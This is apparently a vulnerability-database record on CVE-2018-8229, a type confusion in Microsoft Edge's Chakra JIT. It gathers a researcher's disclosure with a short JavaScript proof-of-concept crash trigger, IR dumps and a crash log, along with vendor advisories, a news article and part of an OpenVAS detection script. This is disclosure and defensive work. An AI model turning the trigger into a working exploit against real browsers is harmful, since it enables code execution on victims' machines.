\r\nBackground:\r\nInvariant operations like SetConcatStrMultiItemBE in a loop can be hoisted to the landing pad of the loop to avoid performing the same operation multiple times. When Chakra hoists a SetConcatStrMultiItemBE instruction, it creates a new Conv_PrimStr instruction to ensure the type of the Src1 of the SetConcatStrMultiItemBE instruction to be String and inserts it right before the SetConcatStrMultiItemBE instruction.\r\n \r\nWhat happens here is:\r\n1. The CheckFixedFld instruction ensures the type of s7 to be String.\r\n2. Chakra judges that the CheckFixedFld instruction can't be hoisted in the case. It remains in the loop.\r\n3. Chakra judges that the SetConcatStrMultiItemBE instructions can be hoisted. It hoists them along with a newly created Conv_PrimStr instruction, but without invalidating the type of s7 (String).\r\n4. So the \"s49[String].var = Conv_PrimStr s7<s44>[String].var\" instruction is inserted into the landing pad. Since s7 is already assumed to be of String, the instruction will have no effects at all.\r\n5. No type check will be performed. It will result in type confusion.\r\n*/\n\n# 0day.today [2018-07-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30708"}], "packetstorm": [{"lastseen": "2018-07-13T17:34:27", "description": "", "published": "2018-07-12T00:00:00", "type": "packetstorm", "title": "Microsoft Edge Chakra JIT SetConcatStrMultiItemBE Type Confusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8229"], "modified": "2018-07-12T00:00:00", "id": "PACKETSTORM:148527", "href": "https://packetstormsecurity.com/files/148527/Microsoft-Edge-Chakra-JIT-SetConcatStrMultiItemBE-Type-Confusion.html", "sourceData": "`Microsoft Edge: Chakra: JIT: Type confusion with hoisted SetConcatStrMultiItemBE instructions \n \nCVE-2018-8229 \n \n \nHere's a PoC: \nfunction opt(str) { \nfor (let i = 0; i < 200; i++) { \nlet tmp = str.charCodeAt('AAAAAAAAAA' + str + 'BBBBBBBBBB'); \n} \n} \n \nopt('x'); \nopt(0x1234); \n \n \nHere's the IR code of the PoC before the global optimization phase: \n--------- \nFunctionEntry # \ns18.u64 = ArgIn_A prm1<32>.var # \ns9.var = LdSlot s32(s18l[53]).var # \ns7.var = LdSlot s20(s18l[51]).var # \ns8.var = LdSlot s19(s18l[52]).var # \ns1[Object].var = Ld_A 0x7FFFF47A0000 (GlobalObject)[Object].var # \ns2.var = LdC_A_I4 0 (0x0).i32 # \ns3.var = LdC_A_I4 200 (0xC8).i32 # \ns4.var = LdC_A_I4 1 (0x1).i32 # \ns5[String].var = LdStr 0x7FFFF47B9080 (\"AAAAAAAAAA\")[String].var # \ns6[String].var = LdStr 0x7FFFF47B90A0 (\"BBBBBBBBBB\")[String].var # \ns17.var = InitLoopBodyCount #0009 \n--------- \n$L1: >>>>>>>>>>>>> LOOP TOP >>>>>>>>>>>>> Implicit call: no #000b \n \n \nLine 2: i < 200; i++) { \nCol 21: ^ \nStatementBoundary #1 #000b \ns17.i32 = IncrLoopBodyCount s17.i32 #000b \nBrLt_A $L3, s8.var, s3.var #000b \nBr $L2 #0010 \n--------- \n$L3: #0013 \n \n \nLine 3: let tmp = str.charCodeAt('AAAAAAAAAA' + str + 'BBBBBBBBBB'); \nCol 9: ^ \nStatementBoundary #2 #0013 \ns13.var = Ld_A s7.var #0013 \nCheckFixedFld s21(s13->charCodeAt)<0,m~=,+-,s?,s?>.var #0016 Bailout: #0016 (BailOutFailedEquivalentFixedFieldTypeCheck) \ns12[ffunc][Object].var = Ld_A 0x7FFFF47972C0 (FunctionObject).var # \ns22.var = StartCall 2 (0x2).i32 #001a \ns36.var = BytecodeArgOutCapture s13.var #001d \ns24[String].var = Conv_PrimStr s5.var #0020 \ns25[String].var = Conv_PrimStr s7.var #0020 \ns26[String].var = Conv_PrimStr s6.var #0020 \nByteCodeUses s7 #0020 \ns27.var = SetConcatStrMultiItemBE s24[String].var #0020 \ns28.var = SetConcatStrMultiItemBE s25[String].var, s27.var #0020 \ns29.var = SetConcatStrMultiItemBE s26[String].var, s28.var #0020 \ns14[String].var = NewConcatStrMultiBE 3 (0x3).u32, s29.var #0020 \ns35.var = BytecodeArgOutCapture s14.var #0025 \narg1(s34)<0>.u64 = ArgOut_A_InlineSpecialized 0x7FFFF47972C0 (FunctionObject).var, arg2(s30)<8>.var #0028 \narg1(s23)<0>.var = ArgOut_A s36.var, s22.var #0028 \narg2(s30)<8>.var = ArgOut_A s35.var, arg1(s23)<0>.var #0028 \nByteCodeUses s12 #0028 \ns31[CanBeTaggedValue_Int_Number].var = CallDirect String_CharCodeAt.u64, arg1(s34)<0>.u64 #0028 \ns9.var = Ld_A s31.var #0032 \n \n \nLine 2: i++) { \nCol 30: ^ \nStatementBoundary #3 #0035 \ns8.var = Incr_A s8.var #0035 \nBr $L1 #0038 \n--------- \n$L2: #003d \n \n \nLine 5: } \nCol 1: ^ \nStatementBoundary #4 #0038 \ns16.i64 = Ld_I4 61 (0x3D).i64 #003d \ns19(s18l[52]).var = StSlot s8.var #003e \ns32(s18l[53]).var = StSlot s9.var #003e \nStLoopBodyCount s17.i32 #003e \nRet s16.i64 #003e \n---------------------------------------------------------------------------------------- \n \nAfter the global optimization phase: \n--------- \nFunctionEntry # \ns18.u64 = ArgIn_A prm1<32>.var! # \ns9[LikelyCanBeTaggedValue_Int].var = LdSlot s32(s18l[53])[LikelyCanBeTaggedValue_Int].var! # \ns7<s44>[LikelyCanBeTaggedValue_String].var = LdSlot s20(s18l[51])[LikelyCanBeTaggedValue_String].var! # \ns8[LikelyCanBeTaggedValue_Int].var = LdSlot s19(s18l[52])[LikelyCanBeTaggedValue_Int].var! # \ns5[String].var = LdStr 0x7FFFF47B9080 (\"AAAAAAAAAA\")[String].var # \ns6[String].var = LdStr 0x7FFFF47B90A0 (\"BBBBBBBBBB\")[String].var # \ns17.var = InitLoopBodyCount #0009 \ns42(s8).i32 = FromVar s8[LikelyCanBeTaggedValue_Int].var # Bailout: #000b (BailOutIntOnly) \ns27.var = SetConcatStrMultiItemBE s5[String].var #0020 \ns49[String].var = Conv_PrimStr s7<s44>[String].var # \ns28.var = SetConcatStrMultiItemBE s49[String].var!, s27.var! #0020 \ns29.var = SetConcatStrMultiItemBE s6[String].var, s28.var! #0020 \ns14[String].var = NewConcatStrMultiBE 3 (0x3).u32, s29.var! #0020 \nBailTarget # Bailout: #000b (BailOutShared) \n--------- \n$L1: >>>>>>>>>>>>> LOOP TOP >>>>>>>>>>>>> Implicit call: no #000b \n \n \nLine 2: i < 200; i++) { \nCol 21: ^ \nStatementBoundary #1 #000b \ns17.i32 = IncrLoopBodyCount s17.i32! #000b \nBrGe_I4 $L2, s42(s8).i32, 200 (0xC8).i32 #000b \n \n \nLine 3: let tmp = str.charCodeAt('AAAAAAAAAA' + str + 'BBBBBBBBBB'); \nCol 9: ^ \nStatementBoundary #2 #0013 \nCheckFixedFld s43(s7<s44>[LikelyCanBeTaggedValue_String]->charCodeAt)<0,m~=,++,s44!,s45+,{charCodeAt(0)~=}>.var! #0016 Bailout: #0016 (BailOutFailedEquivalentFixedFieldTypeCheck) \ns22.var = StartCall 2 (0x2).i32 #001a \narg1(s34)<0>.u64 = ArgOut_A_InlineSpecialized 0x7FFFF47972C0 (FunctionObject).var, arg2(s30)<8>.var! #0028 \narg1(s23)<0>.var = ArgOut_A s7<s44>[String].var, s22.var! #0028 \narg2(s30)<8>.var = ArgOut_A s14[String].var, arg1(s23)<0>.var! #0028 \ns31[CanBeTaggedValue_Int_Number].var = CallDirect String_CharCodeAt.u64, arg1(s34)<0>.u64! #0028 Bailout: #0032 (BailOutOnImplicitCalls) \ns9[CanBeTaggedValue_Int_Number].var = Ld_A s31[CanBeTaggedValue_Int_Number].var! #0032 \n \n \nLine 2: i++) { \nCol 30: ^ \nStatementBoundary #3 #0035 \ns42(s8).i32 = Add_I4 s42(s8).i32!, 1 (0x1).i32 #0035 \nBr $L1 #0038 \n--------- \n$L2: #003d \n \n \nLine 5: } \nCol 1: ^ \nStatementBoundary #4 #003d \ns8[CanBeTaggedValue_Int].var = ToVar s42(s8).i32! #003e \ns19(s18l[52])[CanBeTaggedValue_Int].var! = StSlot s8[CanBeTaggedValue_Int].var! #003e \ns32(s18l[53])[LikelyCanBeTaggedValue_Int_Number].var! = StSlot s9[LikelyCanBeTaggedValue_Int_Number].var! #003e \nStLoopBodyCount s17.i32! #003e \nRet 61 (0x3D).i32 #003e \n---------------------------------------------------------------------------------------- \n \nCrash log: \n[----------------------------------registers-----------------------------------] \nRAX: 0x1000000001234 \nRBX: 0x7ffff47c5ff4 --> 0x31 ('1') \nRCX: 0x7ff7f4600000 --> 0x0 \nRDX: 0x0 \nRSI: 0x80000001 --> 0x0 \nRDI: 0x1000000001234 \nRBP: 0x7ffffffef410 --> 0x7ffffffef590 --> 0x7ffffffefb90 --> 0x7ffffffefc90 --> 0x7ffffffefef0 --> 0x7fffffff48b0 (--> ...) \nRSP: 0x7ffffffef340 --> 0x7ffffffef3b0 --> 0x1000000001234 \nRIP: 0x7ff7f385017a (cmp QWORD PTR [rax],r10) \nR8 : 0x55555cfbc870 --> 0x555557fc27e0 (<Js::RecyclableObject::Finalize(bool)>: push rbp) \nR9 : 0x7ff7f4600000 --> 0x0 \nR10: 0x55555cfbc870 --> 0x555557fc27e0 (<Js::RecyclableObject::Finalize(bool)>: push rbp) \nR11: 0x7ffff47b9080 --> 0x55555cfa0f18 --> 0x555557fc27e0 (<Js::RecyclableObject::Finalize(bool)>: push rbp) \nR12: 0x0 \nR13: 0x7ffff47b36b0 --> 0x55555cfbee70 --> 0x555557fc27e0 (<Js::RecyclableObject::Finalize(bool)>: push rbp) \nR14: 0x0 \nR15: 0x1000000001234 \nEFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow) \n[-------------------------------------code-------------------------------------] \n0x7ff7f385016e: mov BYTE PTR [rcx+rax*1],0x1 \n0x7ff7f3850172: mov rax,QWORD PTR [rbp-0x10] \n0x7ff7f3850176: mov r10,QWORD PTR [rbp-0x18] \n=> 0x7ff7f385017a: cmp QWORD PTR [rax],r10 \n0x7ff7f385017d: je 0x7ff7f385037c \n0x7ff7f3850183: mov rcx,rax \n0x7ff7f3850186: mov QWORD PTR [rbp-0x18],rcx \n0x7ff7f385018a: mov eax,DWORD PTR [rcx+0x18] \n[------------------------------------stack-------------------------------------] \n0000| 0x7ffffffef340 --> 0x7ffffffef3b0 --> 0x1000000001234 \n0008| 0x7ffffffef348 --> 0x7ffff471c1e0 --> 0x55555cf48850 --> 0x555556c17100 (<Js::FunctionBody::Finalize(bool)>: push rbp) \n0016| 0x7ffffffef350 --> 0x7ffff471c298 --> 0x7ffff4774140 --> 0x10f1215030708 \n0024| 0x7ffffffef358 --> 0x7ffff471c298 --> 0x7ffff4774140 --> 0x10f1215030708 \n0032| 0x7ffffffef360 --> 0x7ffffffef410 --> 0x7ffffffef590 --> 0x7ffffffefb90 --> 0x7ffffffefc90 --> 0x7ffffffefef0 (--> ...) \n0040| 0x7ffffffef368 --> 0x555556c40b8b (<Js::CompactCounters<Js::FunctionBody, Js::FunctionBody::CounterFields>::Get(Js::FunctionBody::CounterFields) const+139>: movzx ecx,BYTE PTR [rbp-0x22]) \n0048| 0x7ffffffef370 --> 0x7ffff47a4238 --> 0x7ffff47c5fe0 --> 0x7ffff4796a40 --> 0x55555cf4df58 --> 0x555556cb7a20 (<JsUtil::List<Js::LoopEntryPointInfo*, Memory::Recycler, false, Js::CopyRemovePolicy, DefaultComparer>::IsReadOnly() const>: push rbp) \n0056| 0x7ffffffef378 --> 0x7ffffffef4a0 --> 0x7ffffffef4c0 --> 0x7ffffffef590 --> 0x7ffffffefb90 --> 0x7ffffffefc90 (--> ...) \n[------------------------------------------------------------------------------] \nLegend: code, data, rodata, value \nStopped reason: SIGSEGV \n0x00007ff7f385017a in ?? () \n \n \nBackground: \nInvariant operations like SetConcatStrMultiItemBE in a loop can be hoisted to the landing pad of the loop to avoid performing the same operation multiple times. When Chakra hoists a SetConcatStrMultiItemBE instruction, it creates a new Conv_PrimStr instruction to ensure the type of the Src1 of the SetConcatStrMultiItemBE instruction to be String and inserts it right before the SetConcatStrMultiItemBE instruction. \n \nWhat happens here is: \n1. The CheckFixedFld instruction ensures the type of s7 to be String. \n2. Chakra judges that the CheckFixedFld instruction can't be hoisted in the case. It remains in the loop. \n3. Chakra judges that the SetConcatStrMultiItemBE instructions can be hoisted. It hoists them along with a newly created Conv_PrimStr instruction, but without invalidating the type of s7 (String). \n4. So the \"s49[String].var = Conv_PrimStr s7<s44>[String].var\" instruction is inserted into the landing pad. Since s7 is already assumed to be of String, the instruction will have no effects at all. \n5. No type check will be performed. It will result in type confusion. \n \n \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: lokihardt \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/148527/GS20180712215007.txt"}], "kaspersky": [{"lastseen": "2020-09-02T11:57:18", "bulletinFamily": "info", "cvelist": ["CVE-2018-8229", "CVE-2018-8227", "CVE-2018-8243"], "description": "### *Detect date*:\n06/12/2018\n\n### *Severity*:\nWarning\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft ChakraCore. Malicious users can exploit these vulnerabilities to execute arbitrary code.\n\n### *Affected products*:\nChakraCore\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2018-8227](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8227>) \n[CVE-2018-8229](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8229>) \n[CVE-2018-8243](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8243>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[ChakraCore](<https://threats.kaspersky.com/en/product/ChakraCore/>)\n\n### *CVE-IDS*:\n[CVE-2018-8227](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8227>)0.0Unknown \n[CVE-2018-8229](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8229>)0.0Unknown \n[CVE-2018-8243](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8243>)0.0Unknown\n\n### *Microsoft official advisories*:", "edition": 33, "modified": "2020-01-24T00:00:00", "published": "2018-06-12T00:00:00", "id": "KLA11264", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11264", "title": "\r KLA11264Multiple vulnerabilities in Microsoft ChakraCore ", "type": "kaspersky", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T12:00:19", "bulletinFamily": "info", "cvelist": ["CVE-2018-8229", "CVE-2018-8249", "CVE-2018-0978", "CVE-2018-8235", "CVE-2018-8236", "CVE-2018-8110", "CVE-2018-8234", "CVE-2018-8113", "CVE-2018-8267", "CVE-2018-8111", "CVE-2018-8227", "CVE-2018-8243", "CVE-2018-0871"], "description": "### *Detect date*:\n06/12/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Browsers. Malicious users can exploit these vulnerabilities to execute arbitrary code, bypass security restrictions, obtain sensitive information.\n\n### *Affected products*:\nInternet Explorer 10 \nInternet Explorer 11 \nInternet Explorer 9 \nChakraCore \nMicrosoft Edge (EdgeHTML-based)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2018-8227](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8227>) \n[CVE-2018-8229](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8229>) \n[CVE-2018-8236](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8236>) \n[CVE-2018-8113](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8113>) \n[CVE-2018-8234](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8234>) \n[CVE-2018-8249](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8249>) \n[CVE-2018-8110](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8110>) \n[CVE-2018-8235](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8235>) \n[CVE-2018-8267](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8267>) \n[CVE-2018-0871](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-0871>) \n[CVE-2018-8111](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8111>) \n[CVE-2018-0978](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-0978>) \n[CVE-2018-8243](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8243>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2018-8227](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8227>)0.0Unknown \n[CVE-2018-8229](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8229>)0.0Unknown \n[CVE-2018-8243](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8243>)0.0Unknown \n[CVE-2018-8236](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8236>)0.0Unknown \n[CVE-2018-8113](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8113>)0.0Unknown \n[CVE-2018-8234](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8234>)0.0Unknown \n[CVE-2018-8249](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8249>)0.0Unknown \n[CVE-2018-8110](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8110>)0.0Unknown \n[CVE-2018-8235](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8235>)0.0Unknown \n[CVE-2018-8267](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8267>)0.0Unknown \n[CVE-2018-0871](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0871>)0.0Unknown \n[CVE-2018-8111](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8111>)0.0Unknown \n[CVE-2018-0978](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0978>)0.0Unknown\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4284860](<http://support.microsoft.com/kb/4284860>) \n[4284874](<http://support.microsoft.com/kb/4284874>) \n[4284826](<http://support.microsoft.com/kb/4284826>) \n[4284835](<http://support.microsoft.com/kb/4284835>) \n[4284880](<http://support.microsoft.com/kb/4284880>) \n[4284819](<http://support.microsoft.com/kb/4284819>) \n[4230450](<http://support.microsoft.com/kb/4230450>) \n[4284855](<http://support.microsoft.com/kb/4284855>) \n[4284815](<http://support.microsoft.com/kb/4284815>) \n[4532693](<http://support.microsoft.com/kb/4532693>) \n[4532691](<http://support.microsoft.com/kb/4532691>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 34, "modified": "2020-06-18T00:00:00", "published": "2018-06-12T00:00:00", "id": "KLA11265", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11265", "title": "\r KLA11265Multiple vulnerabilities in Microsoft Internet Explorer & Edge ", "type": "kaspersky", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2019-05-30T05:52:23", "bulletinFamily": "info", "cvelist": ["CVE-2018-8140", "CVE-2018-8225", "CVE-2018-8229", "CVE-2018-8231", "CVE-2018-8248", "CVE-2018-8267"], "description": "Microsoft has fixed 11 critical bugs in its June Patch Tuesday update, including a Windows DNS-related remote code execution flaw. It also patched an easily exploitable problem in the Cortana voice engine.\n\nOne of the most serious issues is a critical remote code execution vulnerability ([CVE-2018-8225](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8225>)) in the Windows Domain Name System (DNS), which could allow an attacker to take full control of the targeted machine. This can be carried out by sending a maliciously crafted DNS packet to the victim endpoint from a DNS server, or using spoofed DNS responses from an attack box, according to Microsoft\u2019s June Patch Tuesday security [bulletin](<https://portal.msrc.microsoft.com/en-us/security-guidance>).\n\n\u201cThe attacker could attempt to man-in-the-middle a legitimate query,\u201d explained Dustin Childs, researcher at the Zero Day Initiative, in its Patch Tuesday analysis [posted](<https://www.zerodayinitiative.com/blog/2018/6/12/the-june-2018-security-update-review>) on Tuesday. \u201cThe more likely scenario is simply tricking a target DNS server into querying an evil server that sends the corrupted response \u2013 something that can be done from the command line. It\u2019s also something that could be easily scripted. This means there\u2019s a system-level bug in a listening service on critical infrastructure servers, which also means this is wormable.\u201d\n\nHe added, \u201c\u2018patch now\u2019 doesn\u2019t even seem forceful enough. I have the sense we\u2019ll be hearing about this bug for a while.\u201d\n\nA privilege-escalation vulnerability rated important in Cortana ([CVE-2018-8140](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8140>)) meanwhile is due to the voice engine\u2019s service retrieving data from input services \u201cwithout consideration for status,\u201d according to Microsoft. It was [first discussed](<https://www.youtube.com/watch?v=7AyW0lCCyGI>) in March at a researcher conference.\n\n\u201cWhile that description from Microsoft is a bit oblique, it seems someone close enough to speak to a Cortana-enabled system could execute programs with elevated privileges,\u201d said Childs. \u201cAgain, the attacker needs physical or console access to the system, so remote attacks not likely \u2013 provided you\u2019re not talking on a speakerphone. Jokes aside, with the proliferation of personal assistants and similar services, bugs in these products will likely become more prevalent in the years to come.\u201d\n\nResearchers put a finer point on it with a few [proof-of-concepts](<https://securingtomorrow.mcafee.com/mcafee-labs/want-to-break-into-a-locked-windows-10-device-ask-cortana-cve-2018-8140/>) for the Cortana flaw, demonstrating a range of attack vectors for accessing confidential information. For instance, after bypassing the locked screen using a simple voice command, McAfee found that it was possible to easily search for confidential information and files using Cortana to search for keywords such as \u201cOneDrive\u201d; and, the researchers were able to execute arbitrary code from the lock screen using Cortana\u2019s contextual menu. In a demo, they were able to carry out a full password reset and then log in on a Windows 10 build.\n\n\u201cThis particular vulnerability is not highly critical, but it is interesting as it targets a growing and popular class of technology: intelligent digital personal assistants,\u201d Lane Thames, senior security researcher at Tripwire, told Threatpost. \u201cWe\u2019ve already seen [weaknesses](<https://threatpost.com/voice-squatting-turns-alexa-google-home-into-silent-spies/132068/>) recently in Alexa due to third-party application issues. More of these types of problems will start to appear, most likely, in the years to come.\u201d\n\nIn total, Microsoft\u2019s June Patch Tuesday roundup included 50 security patches, with 11 listed as critical and 39 rated important. An out-of-band fix meanwhile was [released for Adobe Flash Player last week](<https://threatpost.com/adobe-flash-player-zero-day-spotted-in-the-wild/129742/>).\n\nAmong the other notable patches is one for a memory corruption vulnerability in Microsoft Edge\u2019s Chakra scripting engine ([CVE-2018-8229](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8229>)); this can be triggered when a victim visits a malicious website, where an attacker could use a specially crafted JavaScript program to execute arbitrary code. an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights, Microsoft said.\n\n\u201cBecause JavaScript is so pervasive and needed for many websites to even operate, disabling the Chakra Scripting Engine is not an option, which means the vast majority of Microsoft Edge users are vulnerable to this attack,\u201d said Allan Liska, threat intelligence analyst at Recorded Future, via email. \u201cIt is important to patch Microsoft Edge as soon as possible to prevent this attack.\u201d\n\nThere\u2019s also a critical HTTP Protocol Stack remote code execution vulnerability ([CVE-2018-8231](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8231>)) affecting the web server component http.sys, which confers elevated privileges to a remote attacker. The attacker can cause code execution by sending a malformed packet to a target server.\n\n\u201cThe patch notes that, \u2018in most situations, an unauthenticated attacker\u2019 could do this,\u201d ZDI\u2019s Childs said. \u201cIt\u2019s unclear what those other situations may be, but that puts this bug pretty close to the wormable category as well. Either way, this should also be near the top of your test and patch priority list.\u201d\n\nOther vulnerabilities being addressed include a remote code execution flaw in Excel ([CVE-2018-8248](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8248>)); two privilege-escalation vulnerabilities in SharePoint Server and one in Office Web Apps Server; and seven separate Device Guard vulnerabilities in Windows 10 Enterprise and Server 2016 which allowed code integrity policies to be bypassed.\n\n\u201cJune\u2019s Patch Tuesday is rather run-of-the-mill, with a total of 50 vulnerabilities being addressed by Microsoft,\u201d said Greg Wiseman, senior security researcher at Rapid7, in an email. \u201cNone of the Microsoft vulnerabilities patched today have been seen in the wild, although [CVE-2018-8267 ](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8267>)(an RCE vulnerability in Internet Explorer) had been publicly disclosed before today\u2019s release and is likely to be exploited soon if it hasn\u2019t already been.\u201d\n", "modified": "2018-06-12T21:36:17", "published": "2018-06-12T21:36:17", "id": "THREATPOST:455B7050303F6EBB708DA86EB2C4872C", "href": "https://threatpost.com/june-patch-tuesday-microsoft-issues-fixes-for-dns-cortana/132778/", "type": "threatpost", "title": "June Patch Tuesday: Microsoft Issues Critical Fixes for DNS, Cortana", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-06-08T23:06:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8216", "CVE-2018-8205", "CVE-2018-1036", "CVE-2018-1040", "CVE-2018-8212", "CVE-2018-8215", "CVE-2018-8229", "CVE-2018-8169", "CVE-2018-0978", "CVE-2018-8217", "CVE-2018-8226", "CVE-2018-8235", "CVE-2018-8236", "CVE-2018-8209", "CVE-2018-8221", "CVE-2018-8213", "CVE-2018-8234", "CVE-2018-8207", "CVE-2018-8210", "CVE-2018-8267", "CVE-2018-8251", "CVE-2018-8231", "CVE-2018-8201", "CVE-2018-8225"], "description": "This host is missing a critical security\n update according to Microsoft KB4284860", "modified": "2020-06-04T00:00:00", "published": "2018-06-13T00:00:00", "id": "OPENVAS:1361412562310813529", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813529", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4284860)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4284860)\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813529\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-0978\", \"CVE-2018-1036\", \"CVE-2018-1040\", \"CVE-2018-8169\",\n \"CVE-2018-8201\", \"CVE-2018-8205\", \"CVE-2018-8207\", \"CVE-2018-8209\",\n \"CVE-2018-8210\", \"CVE-2018-8212\", \"CVE-2018-8213\", \"CVE-2018-8215\",\n \"CVE-2018-8216\", \"CVE-2018-8217\", \"CVE-2018-8221\", \"CVE-2018-8225\",\n \"CVE-2018-8226\", \"CVE-2018-8229\", \"CVE-2018-8231\", \"CVE-2018-8234\",\n \"CVE-2018-8235\", \"CVE-2018-8236\", \"CVE-2018-8251\", \"CVE-2018-8267\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-06-13 09:08:36 +0530 (Wed, 13 Jun 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4284860)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4284860\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to errors,\n\n - When the Windows kernel improperly handles objects in memory.\n\n - When Windows improperly handles objects in memory.\n\n - When the (Human Interface Device) HID Parser Library driver improperly handles\n objects in memory.\n\n - When Windows allows a normal user to access the Wireless LAN profile of an\n administrative user.\n\n - When Microsoft Edge improperly accesses objects in memory.\n\n - When Microsoft Edge improperly handles requests of different origins.\n\n - When Microsoft Edge improperly handles objects in memory.\n\n - When Windows Media Foundation improperly handles objects in memory.\n\n - In the way that the Windows Code Integrity Module performs hashing.\n\n - When Internet Explorer improperly accesses objects in memory.\n\n - When NTFS improperly checks access.\n\n - In the way that the Chakra scripting engine handles objects in memory in\n Microsoft Edge.\n\n - In the way that the scripting engine handles objects in memory in Internet\n Explorer.\n\n - In Windows Domain Name System (DNS) DNSAPI.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an 